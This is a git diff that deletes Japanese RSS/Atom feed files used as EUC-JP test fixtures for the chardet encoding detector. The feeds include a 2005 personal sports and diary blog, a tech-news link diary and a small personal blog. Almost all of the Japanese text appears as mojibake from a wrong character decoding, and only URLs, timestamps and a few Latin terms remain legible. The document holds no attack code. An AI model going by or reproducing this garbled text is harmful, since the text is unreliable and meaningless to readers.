    -ִּ¶׀ֵ׃ֳז₪ֻ·ֲָ׃₪־¥«¥ב¥י₪ַ»£₪ֳ₪¿ְ¾₪־¶ץ¡£
    -ֶש´ד₪¸₪ד₪¦₪ֳ₪¹₪יֹ»־»³₪¬¸«₪¨₪ֶ₪כ₪±₪ֹ¡¢¬₪«₪י₪₪₪₪ְ₪ם₪¦₪¡ִ
    -₪ב₪¶₪₪·¥ֶ¥ל¥׃₪־₪¦₪י₪₪₪₪ַ¥י¥ֳ¥­¡¼¥¥₪¥ף¥ָ₪ֿ¶ץ₪־¼ּ¿¿₪ֳ₪ֶ₪³₪ָ₪ְ₪ֳ₪¿₪ף₪ַ¡£

    -]]>
    -
    - - ¥´¡¼¥כ¥ַ¥ף¥¿¥₪¥א¿½׀¡×₪ֳ₪ֶ₪₪₪¦₪¸₪ד₪¡ֱ₪₪ - http://ch.kitaguni.tv/u/8280/%a5%b1%a1%bc%a5%bf%a5%a4%a4%ab%a4%e9%c2%cc%cf%c3/0000277137.html - - -ּכ11»‏ֲז°¹₪־¿¼ּכֲ׃¥ֶ¥ל¥׃ָײֱָ₪¬₪½₪ל₪₪ך₪־¿ֽµ₪¡»כִ°־¨¡ֻ₪ֻ₪₪כ₪ָ¡¢¥´¡¼¥כ¥ַ¥ף¥¿¥₪¥א¿½׀¡×₪ֳ₪ֶּכ7»‏ֲז¡ֱ9»‏ֲז₪ֻ°₪ֳ₪ֱ₪₪₪₪₪¹¡£ -ָײֱָ´״·¸¼װ₪ֻ₪ָ₪ֳ₪ֶ₪ֱֵַֿ¨₪₪³₪ָ₪₪־₪ַ₪·₪ח₪¦¡£¡ײ¿½׀¡×¡׳₪ֶ₪§₪₪₪¦₪¯₪י₪₪₪ְ₪·¡£ -₪ַ₪ג₪ֽ¡¢ּכ8»‏ֲז₪ֻ₪₪ֲַֹּ¿₪ֻµ¢ֲנ₪ַ₪­₪₪₪»ה₪ֻ₪ֿ¡¢₪½₪¦¡¢ֲַּֿ₪­₪ן₪₪ך₪₪₪¡£ -₪ֶ₪§₪־₪ֿ¸ְ₪₪²ב₪®₪ַ₪¹₪¬¡¢₪×₪«₪²₪ַ¸«₪י₪ל₪₪¯₪₪ֳ₪¿ָײֱָ₪ֿ₪₪₪ם₪₪₪ם₪¢₪כ₪־₪µ¡£ -ֶ±₪¸₪ט₪¦₪ֻ»׳₪ֳ₪ֶ₪כ¶׀₪ב¿ֽ₪ֿ·כ¹½₪₪₪כ₪ֿ₪÷₪ְ₪ָ»׳₪¦₪₪¡¡ִ - - dsnk-kata - 2005-10-11T23:31:00+09:00 - ּכ11»‏ֲז°¹₪־¿¼ּכֲ׃¥ֶ¥ל¥׃ָײֱָ₪¬₪½₪ל₪₪ך₪־¿ֽµ₪¡»כִ°־¨¡ֻ₪ֻ₪₪כ₪ָ¡¢¥´¡¼¥כ¥ַ¥ף¥¿¥₪¥א¿½׀¡×₪ֳ₪ֶּכ7»‏ֲז¡ֱ9»‏ֲז₪ֻ°₪ֳ₪ֱ₪₪₪₪₪¹¡£
    -ָײֱָ´״·¸¼װ₪ֻ₪ָ₪ֳ₪ֶ₪ֱֵַֿ¨₪₪³₪ָ₪₪־₪ַ₪·₪ח₪¦¡£¡ײ¿½׀¡×¡׳₪ֶ₪§₪₪₪¦₪¯₪י₪₪₪ְ₪·¡£
    -₪ַ₪ג₪ֽ¡¢ּכ8»‏ֲז₪ֻ₪₪ֲַֹּ¿₪ֻµ¢ֲנ₪ַ₪­₪₪₪»ה₪ֻ₪ֿ¡¢₪½₪¦¡¢ֲַּֿ₪­₪ן₪₪ך₪₪₪¡£
    -₪ֶ₪§₪־₪ֿ¸ְ₪₪²ב₪®₪ַ₪¹₪¬¡¢₪×₪«₪²₪ַ¸«₪י₪ל₪₪¯₪₪ֳ₪¿ָײֱָ₪ֿ₪₪₪ם₪₪₪ם₪¢₪כ₪־₪µ¡£
    -ֶ±₪¸₪ט₪¦₪ֻ»׳₪ֳ₪ֶ₪כ¶׀₪ב¿ֽ₪ֿ·כ¹½₪₪₪כ₪ֿ₪÷₪ְ₪ָ»׳₪¦₪₪¡¡ִ

    -]]>
    -
    - - ¥׳¥םּמµו₪¢₪ל₪³₪ל - http://ch.kitaguni.tv/u/8280/%a5%b9%a5%dd%a1%bc%a5%c4/%cc%ee%b5%e5/0000271498.html - - -¥ׁ¥ך¡¼¥°₪־¥׳¥ל¡¼¥×¥ױ¿½׀¥ֱ¡¼¥א₪¬·ט₪₪ך¡¢₪₪¿÷£ַ¯₪ג¼ף°ּ¥¡¼¥¯¥¹₪ֿ2°ּ¥ֱ¡¼¥א₪ֻ5¥²¡¼¥א÷¹₪־¥¢¥ֹ¥׀¥ף¥ֶ¡¼¥¸₪ע₪ִ₪±₪י₪ל₪₪»₪ף₪ַ₪·₪¿¡£ -»ה₪ֿ¥ם¥ֳ¥ֶ₪¬ֶֻ¥·¥ך¡¼¥÷₪ֻ¹װ₪ֳ₪ֶ₪₪·₪₪₪־₪ַ¡¢ּ₪ֻ₪₪₪₪₪ף₪ַ₪¹₪¬¡¥´¥ב¥ף¥¥µ¥₪¡ֻ -µ₪₪ֻ₪₪כ₪־₪ֿ¡¢₪½₪¦¡ײְ¾ֹנ₪«₪ט¡׳ - -÷£µ¨₪־ְ¾ֹנ₪ֿ5³הְ₪כ₪³₪ָ₪¬₪¹₪ַ₪ֻ·טִך₪·₪ֶ₪×₪ך¡¢₪½₪ף₪¥ֱ¡¼¥א₪ֻ₪₪ְ¡ײֶֻ°ל¡׳₪ֻ₪₪ל₪כ²ִַ½ְ­₪¬»ִ₪µ₪ל₪ֶ₪כ₪ָ₪ֿ¡£ -¥כ¡¼¥כ₪ָ₪ֿ₪₪₪¨¡¢₪ט₪ֳ₪₪ֹ₪₪₪₪ְ®ְ׃₪־¥ֹ¥י¥´¥ף¥÷₪ֿ₪₪²ִַ½ְ­₪עֳַ₪¿₪ל₪ֶ₪₪₪₪¹¡£ְµִ¾₪½₪ל₪₪יְ¾ֹנ₪־ֲו₪ן₪ך₪ֳֻזֶ₪ע¥׳¥ל¡¼¥×¥ױ1st¥¹¥ֶ¡¼¥¸₪ֻ½׀₪·₪ֶ₪¯₪ל₪₪ף₪ֶֻ½ְֿ₪־°ל₪ִ₪ג¸ְ₪₪₪¿₪¯₪₪ך₪₪¹¡£ -₪¡ײ¸ע־®ְן₪ַ¥ׁ¥ך¡¼¥°₪־¥ֱ¡¼¥א₪ֹֻי₪±₪₪¯₪ֳ₪¿¥ֹ¥י¥´¥ף¥÷₪ֳ₪ֶ₪ֹ₪¦₪ט¡׳₪ִ₪¥₪³₪ָ₪ַֻ½ְֿ₪ַ₪¹₪¬¡¢¥½¥ױ¥ָ¥׀¥ף¥¯₪הְיֽױ¥ם¥ֳ¥ֶ₪ֻ₪·₪¿₪י¾יֳּ₪¸₪ד₪₪₪₪ָ»׳₪₪₪₪¹¡£ -÷£ַ¯₪־¥׳¥ל¡¼¥×¥ױ₪ְַ¾ֹנ₪¬ֹי₪±₪ט₪¦₪¬¡¢₪ָ₪ֳ₪ָ₪ָ¥כ¡¼¥כ²‏ְµ₪·₪ֶ₪ֽ¡£ - - -₪₪¿³ֵ·₪־´ִֶֶ²עַ₪ּהֲך₪ֿ¢־©₪¿₪·₪₪¸ֲ₪ך₪ַ₪¹¡£ -₪·₪ח₪»₪ף¥׳¥םּמµו³¦₪עµ₪×₪¦₪ָ»²ֶ‏₪·₪¿₪־₪ַ₪₪¯¡¢¥¥ך¥¨¥ג¥ף₪ע₪ִ₪ײ₪·₪¿₪₪¥¥¡¥ֽ₪־²ף₪·¼װ₪ַ₪¹₪ֽ¡£ -¸½¾ל¡ֱ×¼ך₪ה¥¹¥¿¥ֳ¥ױ¡ֻ₪ָ¥ױ¥¡¥ף₪³₪½₪₪₪₪ֲַּֿ₪ְ₪ם₪¦₪¡£ -ּמֲ¼´ִֶֶ₪ֳ₪ֶ¥»¥ל¥¯¥ָ₪ֿ₪ט₪₪₪ָ»׳₪₪₪₪¹₪¬(»ה₪ֿ¥«¡¼¥׳₪ֻֽט₪ֶ₪₪·₪«₪ֳ₪¿¡ִ) - - dsnk-kata - 2005-09-28T09:16:00+09:00 - ¥ׁ¥ך¡¼¥°₪־¥׳¥ל¡¼¥×¥ױ¿½׀¥ֱ¡¼¥א₪¬·ט₪₪ך¡¢₪₪¿÷£ַ¯₪ג¼ף°ּ¥¡¼¥¯¥¹₪ֿ2°ּ¥ֱ¡¼¥א₪ֻ5¥²¡¼¥א÷¹₪־¥¢¥ֹ¥׀¥ף¥ֶ¡¼¥¸₪ע₪ִ₪±₪י₪ל₪₪»₪ף₪ַ₪·₪¿¡£
    -»ה₪ֿ¥ם¥ֳ¥ֶ₪¬ֶֻ¥·¥ך¡¼¥÷₪ֻ¹װ₪ֳ₪ֶ₪₪·₪₪₪־₪ַ¡¢ּ₪ֻ₪₪₪₪₪ף₪ַ₪¹₪¬¡¥´¥ב¥ף¥¥µ¥₪¡ֻ
    -µ₪₪ֻ₪₪כ₪־₪ֿ¡¢₪½₪¦¡ײְ¾ֹנ₪«₪ט¡׳

    -

    ÷£µ¨₪־ְ¾ֹנ₪ֿ5³הְ₪כ₪³₪ָ₪¬₪¹₪ַ₪ֻ·טִך₪·₪ֶ₪×₪ך¡¢₪½₪ף₪¥ֱ¡¼¥א₪ֻ₪₪ְ¡ײֶֻ°ל¡׳₪ֻ₪₪ל₪כ²ִַ½ְ­₪¬»ִ₪µ₪ל₪ֶ₪כ₪ָ₪ֿ¡£
    -¥כ¡¼¥כ₪ָ₪ֿ₪₪₪¨¡¢₪ט₪ֳ₪₪ֹ₪₪₪₪ְ®ְ׃₪־¥ֹ¥י¥´¥ף¥÷₪ֿ₪₪²ִַ½ְ­₪עֳַ₪¿₪ל₪ֶ₪₪₪₪¹¡£ְµִ¾₪½₪ל₪₪יְ¾ֹנ₪־ֲו₪ן₪ך₪ֳֻזֶ₪ע¥׳¥ל¡¼¥×¥ױ1st¥¹¥ֶ¡¼¥¸₪ֻ½׀₪·₪ֶ₪¯₪ל₪₪ף₪ֶֻ½ְֿ₪־°ל₪ִ₪ג¸ְ₪₪₪¿₪¯₪₪ך₪₪¹¡£
    -₪¡ײ¸ע־®ְן₪ַ¥ׁ¥ך¡¼¥°₪־¥ֱ¡¼¥א₪ֹֻי₪±₪₪¯₪ֳ₪¿¥ֹ¥י¥´¥ף¥÷₪ֳ₪ֶ₪ֹ₪¦₪ט¡׳₪ִ₪¥₪³₪ָ₪ַֻ½ְֿ₪ַ₪¹₪¬¡¢¥½¥ױ¥ָ¥׀¥ף¥¯₪הְיֽױ¥ם¥ֳ¥ֶ₪ֻ₪·₪¿₪י¾יֳּ₪¸₪ד₪₪₪₪ָ»׳₪₪₪₪¹¡£
    -÷£ַ¯₪־¥׳¥ל¡¼¥×¥ױ₪ְַ¾ֹנ₪¬ֹי₪±₪ט₪¦₪¬¡¢₪ָ₪ֳ₪ָ₪ָ¥כ¡¼¥כ²‏ְµ₪·₪ֶ₪ֽ¡£

    -

    ₪₪¿³ֵ·₪־´ִֶֶ²עַ₪ּהֲך₪ֿ¢־©₪¿₪·₪₪¸ֲ₪ך₪ַ₪¹¡£
    -₪·₪ח₪»₪ף¥׳¥םּמµו³¦₪עµ₪×₪¦₪ָ»²ֶ‏₪·₪¿₪־₪ַ₪₪¯¡¢¥¥ך¥¨¥ג¥ף₪ע₪ִ₪ײ₪·₪¿₪₪¥¥¡¥ֽ₪־²ף₪·¼װ₪ַ₪¹₪ֽ¡£
    -¸½¾ל¡ֱ×¼ך₪ה¥¹¥¿¥ֳ¥ױ¡ֻ₪ָ¥ױ¥¡¥ף₪³₪½₪₪₪₪ֲַּֿ₪ְ₪ם₪¦₪¡£
    -ּמֲ¼´ִֶֶ₪ֳ₪ֶ¥»¥ל¥¯¥ָ₪ֿ₪ט₪₪₪ָ»׳₪₪₪₪¹₪¬(»ה₪ֿ¥«¡¼¥׳₪ֻֽט₪ֶ₪₪·₪«₪ֳ₪¿¡ִ)

    -]]>
    -
    - - ָב₪·₪₪₪ָ₪­ - http://ch.kitaguni.tv/u/8280/%a5%b1%a1%bc%a5%bf%a5%a4%a4%ab%a4%e9%c2%cc%cf%c3/0000269367.html - - -ֳ₪¯₪₪ַ»ִ¶ָ₪·₪¿₪י¡¢ִך»‏₪ֻµ¢₪ֳ₪ֶ₪ל₪׀¹₪ֳ₪ֶ₪₪«₪ֳ₪¿±«₪ֻ¹₪י₪ל₪¿»‏¡£ - - - -ָב₪·₪₪₪ֳ₪ֶ₪ט₪ך¡¢₪¢₪י₪ז₪כ¿ֽ₪ָ×₪ָֻ¬₪ִֵצ₪¿₪ך₪·₪¿₪¯₪₪ֳ₪ֶ₪כ¡¢¾®₪»¡¼¿ֽ´ײ₪־¥¢¥¿¥· - -µ¢₪ךֶ»₪ט₪ך¡ִ - - dsnk-kata - 2005-09-22T22:52:00+09:00 - ֳ₪¯₪₪ַ»ִ¶ָ₪·₪¿₪י¡¢ִך»‏₪ֻµ¢₪ֳ₪ֶ₪ל₪׀¹₪ֳ₪ֶ₪₪«₪ֳ₪¿±«₪ֻ¹₪י₪ל₪¿»‏¡£

    -

    ָב₪·₪₪₪ֳ₪ֶ₪ט₪ך¡¢₪¢₪י₪ז₪כ¿ֽ₪ָ×₪ָֻ¬₪ִֵצ₪¿₪ך₪·₪¿₪¯₪₪ֳ₪ֶ₪כ¡¢¾®₪»¡¼¿ֽ´ײ₪־¥¢¥¿¥·

    -

    µ¢₪ךֶ»₪ט₪ך¡ִ

    -]]>
    -
    - - ÷ַ¶ב»ה₪־¾׀₪₪₪־¥ִ¥₪ֻ¿¨₪ל₪¿ֳֿ - http://ch.kitaguni.tv/u/8280/%a5%b1%a1%bc%a5%bf%a5%a4%a4%ab%a4%e9%c2%cc%cf%c3/0000269353.html - - -₪¢₪ל₪ֿ19ֶ₪ְ₪ֳ₪¿₪«₪¡£ -TV₪ע₪ִ₪±₪¿₪₪₪₪ֳ₪¿₪ך¿²ֵ¾₪¬₪ֳ₪ֶ₪¿₪י¹₪³₪¨₪ֶ₪­₪¿ֳֿ¡£ -³־₪«¡ײ₪³₪¿₪¨₪ֶ₪ֱ₪ח₪¦₪ְ₪₪¡׳₪ַ¡¢¿´₪ֻ»ִ₪כ₪¢₪־1ִּ₪₪¿₪₪₪¡¢₪ג₪י₪ֳ₪¿¼ך»ז₪ֻ´״₪¹₪כ»כִ°¼װֵך¹ֶ₪ְ₪ֳ₪¿¡£ - -₪½₪־¿ֽ₪ֿ₪ִ₪¯₪׀ַמ₪ַ₪־¥₪¥¥ף¥ָ¡¢21ְ₪µ×₪ֱֻק₪כ¥¿¥₪¥א¥«¥׳¥»¥כ₪«₪י¡¢¼«¬₪ַ¼«¬₪ֻ°¸₪ֶ₪¿¥ֿ¥¬¥­₪ע¼ץ₪±¼ט₪ֳ₪¿₪½₪¦₪¡£ - -¡ײ₪³₪ל₪ֶָ±₪¸¥ב¥ֳ¥»¡¼¥¸₪עֲ¾₪־10¿ֽ₪ֱֻק₪י₪₪₪₪ָ¡¢₪¢₪₪¿₪ֹֻװ¹¬₪¬ֻ¬₪ל₪₪¹¡׳ - -ּ₪ֽט₪־¼«¬₪ֹֻװ¹¬₪־¼ך»ז₪ע½׀₪¹₪ָ₪ֿ¡ִ - - dsnk-kata - 2005-09-22T22:28:00+09:00 - ₪¢₪ל₪ֿ19ֶ₪ְ₪ֳ₪¿₪«₪¡£
    -TV₪ע₪ִ₪±₪¿₪₪₪₪ֳ₪¿₪ך¿²ֵ¾₪¬₪ֳ₪ֶ₪¿₪י¹₪³₪¨₪ֶ₪­₪¿ֳֿ¡£
    -³־₪«¡ײ₪³₪¿₪¨₪ֶ₪ֱ₪ח₪¦₪ְ₪₪¡׳₪ַ¡¢¿´₪ֻ»ִ₪כ₪¢₪־1ִּ₪₪¿₪₪₪¡¢₪ג₪י₪ֳ₪¿¼ך»ז₪ֻ´״₪¹₪כ»כִ°¼װֵך¹ֶ₪ְ₪ֳ₪¿¡£

    -

    ₪½₪־¿ֽ₪ֿ₪ִ₪¯₪׀ַמ₪ַ₪־¥₪¥¥ף¥ָ¡¢21ְ₪µ×₪ֱֻק₪כ¥¿¥₪¥א¥«¥׳¥»¥כ₪«₪י¡¢¼«¬₪ַ¼«¬₪ֻ°¸₪ֶ₪¿¥ֿ¥¬¥­₪ע¼ץ₪±¼ט₪ֳ₪¿₪½₪¦₪¡£

    -

    ¡ײ₪³₪ל₪ֶָ±₪¸¥ב¥ֳ¥»¡¼¥¸₪עֲ¾₪־10¿ֽ₪ֱֻק₪י₪₪₪₪ָ¡¢₪¢₪₪¿₪ֹֻװ¹¬₪¬ֻ¬₪ל₪₪¹¡׳

    -

    ּ₪ֽט₪־¼«¬₪ֹֻװ¹¬₪־¼ך»ז₪ע½׀₪¹₪ָ₪ֿ¡ִ

    -]]>
    -
    - - ₪ה₪ֳ₪ָ¾¡₪ֳ₪¿¡ִ - http://ch.kitaguni.tv/u/8280/%a5%b9%a5%dd%a1%bc%a5%c4/%a5%b5%a5%c3%a5%ab%a1%bc/0000264526.html - - - -₪ֹ¡¼₪ֻ₪«₪³¡¼₪ֻ₪«¾¡₪ֱ₪₪·₪¿¡ִ -₪³₪ל₪ע₪­₪ֳ₪«₪±₪ֶֻגֶֽ₪ג₪ָ₪ג₪₪ֳ₪ֶ₪¯₪כ₪ָ₪ט₪₪₪₪¡¡£ -¸ֱִֵֽ×¼ך¡¢ְֲֳ¸ֶ₪×₪ב₪ַ₪ָ₪¦¡×₪½₪·₪ֶ¥´¡¼¥כ₪¢₪ך₪¬₪ָ₪¦¢צ - dsnk-kata - 2005-09-10T20:50:00+09:00 - 9·מ10ֶvsְ¶¿ו¡¢µ׳¡¹₪־¾¡ֽר¸ו
    -₪ֹ¡¼₪ֻ₪«₪³¡¼₪ֻ₪«¾¡₪ֱ₪₪·₪¿¡ִ
    -₪³₪ל₪ע₪­₪ֳ₪«₪±₪ֶֻגֶֽ₪ג₪ָ₪ג₪₪ֳ₪ֶ₪¯₪כ₪ָ₪ט₪₪₪₪¡¡£
    -¸ֱִֵֽ×¼ך¡¢ְֲֳ¸ֶ₪×₪ב₪ַ₪ָ₪¦¡×₪½₪·₪ֶ¥´¡¼¥כ₪¢₪ך₪¬₪ָ₪¦¢צ

    -]]>
    -
    -
    diff --git a/chardet/tests/EUC-JP/club.h14m.org.xml b/chardet/tests/EUC-JP/club.h14m.org.xml deleted file mode 100644 index 2b136b0..0000000 --- a/chardet/tests/EUC-JP/club.h14m.org.xml +++ /dev/null @@ -1,133 +0,0 @@ - - - - -A Way Out -http://club.h14m.org/kenji/diary/ -A Way Out Recent -Kenji - - - - - - - - - - - - - - - - - - - - - - - ֹת¸«°נ² - http://club.h14m.org/kenji/diary/?200601a#200601021 - ₪¹₪´₪₪¿ֽ₪ַ₪·₪¿¡£÷£ַ¯₪ג¡¢₪ׂ₪ָ₪₪ן₪ך₪¹₪כ₪־₪ֻ¡¢3»‏´ײ₪¯₪י₪₪₪«₪«₪ך₪₪·₪¿¡£ - 2006-01-03T06:40:14+00:00 - - - ₪ֿ₪¸₪ב₪¿¿ֽ¡¢₪ֿ₪¸₪ב₪¿₪₪¿ֽ₪־₪¿₪ב₪־³פ₪־ְַ¶גֱם₪₪ָ₪ב - http://club.h14m.org/kenji/diary/?200601a#200601011 - http://www.bizocean.jp/topics/20051221/index.html ₪ֿ₪¸₪ב₪¿¿ֽ¡¢₪ֿ₪¸₪ב₪¿₪₪¿ֽ₪־₪¿₪ב₪־³פ₪־ְַ¶גֱם₪₪ָ₪ב - 2006-01-01T02:00:07+00:00 - - - MS¡¢÷ֶµ¯ֶ°₪´₪ָ₪ֻOS₪ע₪ג₪ָ₪ֻּב₪¹¥ִ¡¼¥כ₪עֳ¯₪ַ₪ג»ָ₪¨₪כ₪ט₪¦ֶֻ¸ל²½₪·ּµ½‏¸ר³« - http://club.h14m.org/kenji/diary/?200512c#200512291 - http://www.forest.impress.co.jp/article/2005/12/21/sharedtoolkit.html MS¡¢÷ֶµ¯ֶ°₪´₪ָ₪ֻOS₪ע₪ג₪ָ₪ֻּב₪¹¥ִ¡¼¥כ₪עֳ¯₪ַ₪ג»ָ₪¨₪כ₪ט₪¦ֶֻ¸ל²½₪·ּµ½‏¸ר³« - 2005-12-29T06:20:36+00:00 - - - hikiֽׁ bk1¥׳¥י¥°¥₪¥ף - http://club.h14m.org/kenji/diary/?200512c#200512281 - hikiֽׁ bk1¥׳¥י¥°¥₪¥ף¡¢Hiki 0.8.4 ₪ֶַ°₪₪₪¿₪₪¿₪₪¡£ - 2005-12-28T12:32:05+00:00 - - - »°°ז½»ֽ§¶ה¹װ ´ֳ±!₪ה₪µ₪·₪₪¥»¥­¥ו¥ך¥ֶ¥£¶µ¼¼ - http://club.h14m.org/kenji/diary/?200512c#200512271 - http://www.smbc.co.jp/kojin/security/ »°°ז½»ֽ§¶ה¹װ ´ֳ±!₪ה₪µ₪·₪₪¥»¥­¥ו¥ך¥ֶ¥£¶µ¼¼¹גּ¹ְ¸ק»ב₪גְֱַ²₪י₪·₪₪₪ָ₪־₪³₪ָ¡£ - 2005-12-27T08:30:10+00:00 - - - kizasi.jp ÷£ֶ¡¢¥ײ¥ם¥°₪ֲֳַֿך₪ֻ₪₪ֳ₪¿₪³₪ָ₪ֳ₪ֶ? - http://club.h14m.org/kenji/diary/?200512c#200512251 - http://kizasi.jp/ kizasi.jp - 2005-12-25T04:36:36+00:00 - - - Linux ₪«₪י₪־ EDINET ₪־»ָ₪₪‎ - http://club.h14m.org/kenji/diary/?200512c#200512233 - ₪ג₪·₪«₪·₪ֶ Firefox ₪«₪י₪ַ₪ג₪½₪ל₪₪ך₪ֻ»ָ₪¨₪כ? ¡¦ֽ­²ֱ¾·פף¹נ½ס₪־±ֽק ¡¦¹­¹נ₪־±ֽק - 2005-12-23T11:35:09+00:00 - - - ֶֻHP ₪¬ SUSE Linux ₪־¥µ¥¡¼¥ָ₪ע³«»ֿ - http://club.h14m.org/kenji/diary/?200512c#200512232 - http://itpro.nikkeibp.co.jp/article/NEWS/20051130/225413/ ֶֻHP₪¬SUSE Linux₪־¥µ¥¡¼¥ָ₪ע³«»ֿ¡₪¶גֽ»¥°¥ך¥ֳ¥ֹ¼ֽ׳₪ע¸«¹‏₪א - 2005-12-23T10:13:49+00:00 - - - ¥×¡¼¥׳¥ף¥½¡¼¥¹₪־¸µׂ´ֹֽ‎¥·¥¹¥ֶ¥א¡ײSalesLabor¡׳¡¢¥×¡¼¥׳¥ף¥½¡¼¥¹₪־FAQ´ֹֽ‎¥·¥¹¥ֶ¥א¡ײQuestionLabor¡׳ - http://club.h14m.org/kenji/diary/?200512c#200512231 - ¹סֶג½י₪־¥×¡¼¥׳¥ף¥½¡¼¥¹CRM₪ָFAQ´ֹֽ‎¥·¥¹¥ֶ¥א¡₪¥ֽ¥ֳ¥ָ¥ן¡¼¥¯±‏ִּֽׁ¿®¸¦µז½ך₪¬ּµ½‏¸ר³« http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050607/162211/ ¹סֶג½י₪־¥×¡¼¥׳¥ף¥½¡¼¥¹CRM₪ָFAQ´ֹֽ‎¥·¥¹¥ֶ¥א¡₪¥ֽ¥ֳ¥ָ¥ן¡¼¥¯±‏ִּֽׁ¿®¸¦µז½ך₪¬ּµ½‏¸ר³«... - 2005-12-23T10:06:22+00:00 - - - Windows XP ₪־¥·¥¹¥ֶ¥א ¥ַ¥£¥¹¥¯₪עֲ¾₪־¥³¥ף¥װ¥ו¡¼¥¿₪ֻ°ֶ°₪·₪¿¸ו₪ֻ STOP 0x0000007B ¥¨¥י¡¼₪¬ֹ½¼¨₪µ₪ל₪כ - http://club.h14m.org/kenji/diary/?200512c#200512222 - http://support.microsoft.com/default.aspx?scid=kb;ja;JP314082 Windows XP ₪־¥·¥¹¥ֶ¥א ¥ַ¥£¥¹¥¯₪עֲ¾₪־¥³¥ף¥װ¥ו¡¼¥¿₪ֻ°ֶ°₪·₪¿¸ו₪ֻ STOP 0x0000007B ¥¨¥י¡¼₪¬ֹ½¼¨₪µ₪ל₪כ... - 2005-12-21T23:00:07+00:00 - - - ֿ«ֶ¯¼װ₪־¸ִ¿ֽ¾נף¸מ₪ֻ´״₪¹₪כ¹װֶ°»״¿ֻ - http://club.h14m.org/kenji/diary/?200512c#200512221 - http://www2.mhlw.go.jp/kisya/daijin/20001220_01_d/20001220_01_d_shishin.html ֿ«ֶ¯¼װ₪־¸ִ¿ֽ¾נף¸מ₪ֻ´״₪¹₪כ¹װֶ°»״¿ֻ - 2005-12-21T21:48:08+00:00 - - - ¾נף½טֽ‎µ»½ׁ¼װ»מ¸³¿ְ®17ַ¯ֵ½©´²עֵת־ד - http://club.h14m.org/kenji/diary/?200512b#200512201 - http://www.jitec.jp/1_05goukaku/kaitourei.html ¾נף½טֽ‎¿ה¿µ¡¹½¡§¾נף½טֽ‎µ»½ׁ¼װ»מ¸³¥»¥ף¥¿¡¼¡§²עֵת־ד¡¦ְֵַ³ה¹ח ¾נף¥»¥­¥ו¥ך¥ֶ¥£¥¢¥ֹ¥¥ֻ¥¹¥ָ¥ל¡¼¥¿»מ¸³¡SS¡ֻ... - 2005-12-19T23:58:04+00:00 - - - VMWare Player ₪ַ RawDisk ₪־²¾ֱ¥¥·¥ף₪ע־©₪ֱ¾ו₪²₪כ - http://club.h14m.org/kenji/diary/?200512b#200512194 - http://iwatama.egoism.jp/comp/#20051030 VMWare Player₪ַRawDisk₪־²¾ֱ¥¥·¥ף₪ע־©₪ֱ¾ו₪²₪כ - 2005-12-19T12:24:43+00:00 - - - ְַ³ֹ½ - http://club.h14m.org/kenji/diary/?200512b#200512193 - http://www.jfast1.net/~nzeiri/ ְַ³ֹ½¡ײ₪³₪־¥µ¥₪¥ָ₪ֿ¡¢ְַֽ‎»־₪ה´כ¶ָ₪־·׀ֽ‎ֳ´ֵצ¼װֵשֱךֵצ₪־ְַּ³·׀ֽ‎ֳ־¼±₪עֽ­₪·₪ֶ₪₪₪כ‎₪¬¡¢ְַּ³ֱב¸«ֹ½₪ָ₪·₪ֶֽרֽׁ₪¹₪כ»צ₪עֱִך₪·₪ֶ÷מְ®₪·₪ֶ₪₪₪₪¹ ¡׳... - 2005-12-19T11:31:25+00:00 - - - ₪­₪ֳ₪³₪־¥ײ¥ם¥° - http://club.h14m.org/kenji/diary/?200512b#200512192 - http://kikko.cocolog-nifty.com/kikko/ ₪­₪ֳ₪³₪־¥ײ¥ם¥° - 2005-12-19T06:18:47+00:00 - - - ¥µ¡¼¥׀(club)ֹ³ט? - http://club.h14m.org/kenji/diary/?200512b#200512191 - 12/10 6:30÷¢₪ט₪ך¡¢¥ַ¥£¥¹¥¯¾ד³²₪ַ¥ַ¥£¥¹¥¯₪״₪־½ס₪­¹‏₪₪¬₪ַ₪­₪₪₪¾ץֲײ₪ַ₪·₪¿₪¬¡¢÷עֶ¡¢ֹµל₪₪₪¿₪·₪₪·₪¿¡£₪´ֲַּֿ₪׳₪±ֳ׳₪·₪₪·₪¿₪³₪ָ₪ע¡¢₪×ֽֿ₪׃₪·₪₪¹¡£ - 2005-12-19T04:46:33+00:00 - - diff --git a/chardet/tests/EUC-JP/contents-factory.com.xml b/chardet/tests/EUC-JP/contents-factory.com.xml deleted file mode 100644 index d936d37..0000000 --- a/chardet/tests/EUC-JP/contents-factory.com.xml +++ /dev/null @@ -1,167 +0,0 @@ - - - - - -₪₪₪ִ₪ג₪־₪­₪ג₪ֱ -http://contents-factory.com/blog/ -ִא₪ך₪־₪³₪ָ¡¢¥¢¥¦¥ָ¥ֹ¥¢₪־₪³₪ָ¡¢ֶ¾ן₪־₪³₪ָ¡¢»ֵ»צ₪־₪³₪ָ¡¢¹׃ְמ¥µ¥₪¥¯¥ך¥ף¥°¥ם¡¼¥ֹ₪ַ₪־¥¥¿¥ך¥ף¥°₪־₪³₪ָ₪₪ֹ₪עµ₪₪₪°₪ל₪ֻ½ס₪₪₪ֶ₪₪₪­₪₪¹¡£]]> -ja - -2006-01-01T22:46:08+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - -2006ַ¯ -http://contents-factory.com/blog/archives/200601012246.php -₪¹₪₪ֶ₪ע¾ט₪»₪ֶ¡¢₪₪¯₪¿₪ֱ₪־ְַֿ±₪ֿ¡¢ ְֲֽ₪ע₪₪¿¿·₪·₪¯₪ׂ₪ָ½ה₪ך₪¹₪כ־¹₪ֻ₪ַ₪כ₪ָ₪³₪ם₪ְ¡£ ₪¹₪₪ֶ₪־¿ֽ₪ָ¡¢₪¹₪₪ֶ₪־ְ¸ּ¿₪¢₪כ×₪ֻ¡¢´¶¼ױ¹ח¾¸¡£ ¿·ַ¯₪×₪ב₪ַ₪ָ₪¦₪´₪¶₪₪₪₪¹¡£ ¡״¿¹₪«₪י₪־¼ך»ז¡ִֵ¥µֱֽ÷ֳר¡¡₪ט₪ך... -ֶµ­¡¦₪ִ₪ײ₪ה₪­ -katayama -2006-01-01T22:46:08+09:00 - - -RedWing 875(1996ַ¯¥ג¥ַ¥כ¡ֻ -http://contents-factory.com/blog/archives/200512312058.php - RedWing¡¡875₪־1996ַ¯¥ג¥ַ¥כ₪ַ₪¹¡£₪³₪־¥ג¥ַ¥כ₪¬½׀₪כ₪₪ְַײֳד¥ל¥¶¡¼₪ְ₪ֳ₪¿₪־₪ַ₪¹₪¬¡¢ 